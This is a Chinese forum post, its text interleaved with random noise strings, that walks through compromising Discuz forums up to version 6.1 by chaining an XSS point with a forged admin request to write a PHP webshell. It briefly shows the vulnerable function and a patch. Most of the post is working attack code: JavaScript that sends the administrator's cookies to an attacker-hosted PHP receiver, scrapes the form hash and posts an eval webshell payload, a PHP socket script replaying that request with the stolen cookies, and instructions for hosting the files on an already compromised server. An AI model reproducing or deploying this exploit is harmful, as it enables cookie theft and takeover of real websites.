Discuz XSS得webshell
3 f g; b, q) \: {) [: KBy racle @tian6.com+ X* a6 Y0 t' y2 M/ D
欢迎转帖.但请保留版权信息.- ^) V% I4 n v. [. ]) L( ^
受影响版本 iscuz<=6.1.0,gbk+utf+big5
D a1 R. v* u8 H2 H; J+ x% p8 X" o/ ]6 z/ \4 \0 n" A: T
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.' l& a4 J1 S; `9 G
7 a4 I. l; q6 @- Y4 T7 R& }8 m& j6 ^" W
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706" Q. J& u$ a+ {1 }- v( G S. `( m
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.9 S3 z' u9 C4 ]" b; j5 V
9 d9 L" B6 a$ D5 S) p0 r
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..8 h: R1 R$ R; T2 P) `
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
% N4 m$ T5 {' p( f- `9 F0 f
: B2 ]; c5 t2 a
" r+ s. |1 @. W' D1 D8 c. Y2 z----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------2 ~; V$ t y* R# A, ?
. e0 f6 W8 j5 h: r
+ }7 m3 f4 z$ x( P1 J) h
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
. M+ v% U4 I- T n
" ?/ [6 c2 ?0 m, {/ U6 D; q. }problem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
2 o* b# m0 C# U( s: X1 q9 w, \
z4 l u2 V. jproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
* z$ L0 |- d* O, r' X6 u3 U9 I/ p& p B% e% g' B1 X" @- o
3 o4 s+ U6 n5 c下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
1 s3 }' z2 g5 j/ c
# Q, i" s+ H8 J; j global $runwizardfile, $runwizardhistory;- }& o J/ B& f' W/ ]1 O Y9 n
# h+ Y( m7 h7 t
$fp = fopen($runwizardfile, 'w');
3 \- l% H( j! ?) v- j
/ C4 x( u0 ]; _$ O+ B$ m& O. Y fwrite($fp, serialize($runwizardhistory));$ h9 n7 ~ b$ a
! d( s: |" D# A& t
fclose($fp);
; z+ t1 D2 G0 e' b! P6 x c' `( C! L6 B. B
}
& v5 Z, B D: B7 |) S n复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
' M3 ?6 R1 {# H" ] O以下是修补的办法:function saverunwizardhistory() {
) y. o% j3 n9 }. o6 Y. f0 j1 R# V7 H- [
& ?' ]2 \$ ?2 r9 ^( j9 k global $runwizardfile, $runwizardhistory;
! V; P" o1 U% y* b+ {# f( w
5 z _) A) I) u% Y9 Z $fp = fopen($runwizardfile, 'w');% x. ?+ }$ C0 C$ U/ Q( `
- ?0 O% z/ {) J+ G $s = '<?php exit;?>';# z. M. B& U+ R6 C: T) R2 ]# r
: H$ G- U! s# D
$s .= serialize($runwizardhistory);
5 n! \7 i8 g+ m1 r: Q0 f2 @5 K% @: U r( K
fwrite($fp, $s);
+ |) X1 N! I# F" {2 O3 S }. B1 f4 F/ x3 i/ \& Y' R7 x
fclose($fp);7 }- G# C z# z/ i: H7 D
$ Z5 X4 _7 ~6 R
}6 z8 O t4 |6 X4 X( P
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
; s$ \$ A! |# N
' }. ]/ P% B+ K+ i, A! R# o
* |! \& r, g# V7 i/ F/ S7 ^
7 H. d- e" ], f& X----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
! V6 K2 e- |9 J1 k" C" t: G* S# W3 `( y3 O
+ a2 U3 Z5 h0 B- K9 Z/ O1 [+ K
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.$ G5 B6 Y( `5 d
. ~& G2 i6 s( s; F. L0 x
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.6 e* h+ u( ]5 S/ N0 g# d
" i% k- F0 z3 E% z1 A1 ~
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.9 y3 X1 ?: M; v7 T% E" M! W
4 |7 o: n5 X, M5 f4 G- k" q
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:; \- I$ d% f' S% p
# P. @$ a/ [: |0 Y. L; P
var url="http://目标网站/admincp.php";
" Y, ~5 U4 h* Q5 L4 P% C5 s8 D, C+ B3 ~ ] h6 l
/*获得cookies*/
) ~6 h$ j. w% }6 \1 k0 X* y7 T6 L4 C; ?# ?5 E
function getURL(s) {+ x+ c4 }! T1 p7 W# T
& i7 n! s; m7 N5 O/ _/ s5 C! k
var image = new Image();3 {" i% Q: l* V- c2 i9 m$ v
4 N' \1 ]7 t" `
image.style.width = 0;/ Q8 [. y* Z. l0 E* d7 f* M6 o
# K' c# P, M7 t( s' U
image.style.height = 0;- \- \% K7 [+ M! P0 B5 s9 \9 i
" X& e8 ]$ t6 `) Z* b7 Ximage.src = s;
$ X- D4 A7 d- A: J4 `! Y" w' E' k1 W& t' G
}
4 G5 l! _7 g3 V, e+ v
% D& i" U. A" Z8 J- b' egetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
; }- y0 z; H( ]- y复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];9 p% Z" X% N0 k& E& t$ ^$ L5 }
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 
$ c! s0 {: S+ E! g9 U$ ~: ?
$ v! v% H0 i( v8 d1 } Z6 @# e) i
9 @$ A- n8 b5 }% {获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";, Q; o. g) @6 X' a9 `3 E4 p
" F/ r* i2 x L" Y. I# p, `# H# v. F3 t' L( b6 I) K: d
6 G3 K: O$ j2 r4 n; f
/*hash*/
7 w# o. C# T1 s$ A8 R8 W# |/ }! J
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");: v) E3 |( M# M2 a
; C0 s8 D# V6 R3 qxmlHttpReq.open("GET", url+"admincp.php?action=home", false);- }0 N9 x9 I! m9 ~" y
3 h; ?) {1 G) M# lxmlHttpReq.send();
$ d8 L3 R/ j% I0 ]( j6 e" P& ]6 E
# d0 f0 ~: x, X+ I& h& {var resource = xmlHttpReq.responseText;4 y8 g2 l9 j. E4 i% R: Y2 J
* S( k b Y. d/ g
var numero = resource.search(/formhash/);
) o! J+ Z5 ^4 a1 j' P
; X3 }7 b0 f+ v! z$ k9 Yvar formhash=encodeURIComponent(resource.substr(numero+17,8));$ J# N" x5 X; f- c9 G: R% W
$ p* o$ U b( J, H: W7 H9 M! O. Q6 B. e
$ p5 x9 K; w* Q' b6 k+ o5 H$ Hvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
9 j7 V/ B* z& ]
" p! k# ~$ J- p8 h0 B8 b! kxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 9 z# p9 i' i3 C/ J, m
" I, }5 d0 h4 D0 ixmlHttpReq.setRequestHeader("Referer", url);
) m |3 J1 l2 B9 S2 ~+ ^$ c8 N1 b* u3 Z2 T& [
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
% C1 m! G; [3 w, ] k$ d/ R1 v# i) H( v5 H" g( k& V
xmlHttpReq.setrequestheader("content-length",post.length); 0 ~$ ^2 a/ y) |$ k( s
! |& O2 I$ x; ?/ ` F, s' |xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
, {; r* q5 Q! m1 i0 M* q, l
7 Y9 M1 q0 f% z: {8 @xmlHttpReq.send(post);//发送数据
, w4 T9 G# c9 M9 s8 x5 N复制代码这里HASH我假设正确,这样提交,也无须cookies& b( b; c. I1 y. p
3 r0 x$ T) w1 P# Q1 z再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);1 ~5 T6 o A6 F- U* r+ s0 e
1 E! s& m# L1 V5 ^# bif (!$sock) die("$errstr ($errno)\n");
8 D2 P( ]" G0 `$ t- A; g: q9 N6 n0 `4 u: p
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
6 X: a3 D# Y7 `* s& W
7 J$ k( B0 ?% c1 x$ D" j0 w$ e3 c8 ?- y( {8 J
* g( |! y% ]" a0 @5 l/ A+ s% |
fwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
& Y. Y3 g5 ~ `8 V* M1 E2 |5 Q0 Q
: T: y% ?! d1 V0 Vfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
' i8 M3 j- `0 b6 K# q
7 V$ p7 C9 ^$ {+ _9 Rfwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");* V) n, ^9 C* v
/ E5 ~1 z. F, ]; ~# @) j3 C+ [4 Nfwrite($sock, "Accept-Language: zh-cn\r\n");$ D0 u4 _# o" }$ L6 B% E
! [2 J; k |, x& d! Q6 T1 b$ Jfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
+ _! P2 l/ v9 H8 y( n+ {, _
# D8 R# j$ i3 k. {fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
) |7 h" a. E0 R# ?, a) N. z4 g
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
, h6 L6 ~$ {2 [4 j! T E) b" U! T+ x) V" n5 \
fwrite($sock, "Host: $url\r\n");
0 u4 j/ g u2 w- R. A: i( b4 x' L" X S' M6 s& V* j
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
7 g; R& L( J1 j! f8 M7 o, O! W. W, c- q; k
fwrite($sock, "Connection: Keep-Alive\r\n");
# H4 e+ N% h) Q8 M C- A, b6 m& u, O4 h6 R2 ?: P9 v$ D
fwrite($sock, "Cache-Control: no-cache\r\n");
/ B; P9 y! d+ w1 d1 n* L- k$ j
+ E6 `: Z1 }2 @fwrite($sock, "Cookie:".$cookies."\r\n\r\n");0 \7 h; i; s% Z8 r
' X$ u9 |/ q5 w+ `6 N( J' g
fwrite($sock, $data);
2 q) _: }% H5 @! X+ }; A+ m1 v+ Z3 `# L- @8 i% t2 }
8 V7 v& o) _# ^4 u+ y) q: R
8 Y! h! ], v' Y2 W9 W
$headers = "";2 A- Q% O. X1 Q! P! F1 r
+ V& D& y* E |% u/ X4 e Twhile ($str = trim(fgets($sock, 4096)))
. u1 t3 A7 h1 p0 V2 H6 r S+ |1 N1 h# B2 t; n3 B
$headers .= "$str\n"; ?0 K# j% e+ i& H2 s* S+ _
& X* {9 l0 }0 g+ q& ]echo "\n";
6 Y% l; o/ B0 ~
1 E3 ^2 d3 n0 P6 @5 x$body = "";8 d1 m2 y8 c9 I7 C
6 u9 [/ R4 B1 z) owhile (!feof($sock))
8 z6 R. T# L0 \8 |( \: _& I0 P& } \! l/ `# D& q
$body .= fgets($sock, 4096);
2 b* i* b M. I" b; H
+ f5 e, m, z0 J: R! S# Mfclose($sock);
: m; _: b8 ?, [
: j) D5 \: D% t5 s8 vecho $body;
6 B9 u: [+ p! z% L复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
) J1 {" \; m: m1 q' Z1 M% Z5 C* Q8 j
) N$ S; ?* \* |6 @/ _
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
; M$ m5 h0 E7 m l H' [
3 R) o$ M+ d+ y% I5 T; o
% i3 v( E: ~& O( w6 m3 }1 HP SOCKET利用方法首先打开racle.js' i' g, C! F8 B) D4 H
4 R; `+ @- z, m) \var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
2 g T2 L+ @. {( e
' s5 i% R$ J0 Y( L# @0 m
0 K7 m0 z: s i5 |: d
* R; A: H. H7 t: }- j然后打开racle@tian6.php
, L ?. d, T: i5 y! x/ t+ z I" h
8 w" ]. T) d f4 V' b1 h5 U& K$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com9 _" q( r+ u* \% @; ?5 J
& }: r) k+ O% B2 h, u, u, d5 g& W7 P8 P% a0 w U+ @) Y
1 J/ _& e7 N& v
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:: g J2 L0 j2 [: O: H3 f/ p
: B6 q: G) y) P; `5 b) I5 l
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));) h( f$ R2 ~6 N" c
) Y E: f3 |9 B+ g6 n" {: }6 F( T
为7 ^ s/ E+ F* H3 D) A
9 K6 h$ a! p" d" b" f' C
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));8 G% T! j8 [) V8 I4 K
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
6 H2 n1 z1 m4 c' @( F5 c8 t& f+ C7 t
1 {" n4 ?4 r: H0 r3 h+ f& l$ g a3 z0 |4 m* W' Y% t
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:3 K8 a6 G4 \: ^: e. e
( D$ q4 ?: n3 h# V( A
var formhash=encodeURIComponent(resource.substr(numero+17,8));
2 Z6 {! i* t" R9 q6 E# @+ ?# z. ]/ ^! A
为
$ {2 P |% N: u- k* ]* e
1 s1 G! ?, H b6 R! fvar formhash=encodeURIComponent(resource.substr(numero+9,8));
8 V- v5 ~1 \% f- g# x复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
, H0 b) m$ N Q2 U8 J
6 ?1 B# y+ F: g1 B7 s Z) w如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
% c% K0 T+ R$ b5 d0 n7 ^0 g
9 B& |, [: e0 n如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点./ G3 }' A' J+ |( K
- g. p& {3 u4 o, ~' h- m, B
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.& U k) u3 q# Q) o5 I
8 [: U& B3 I, b# {. o |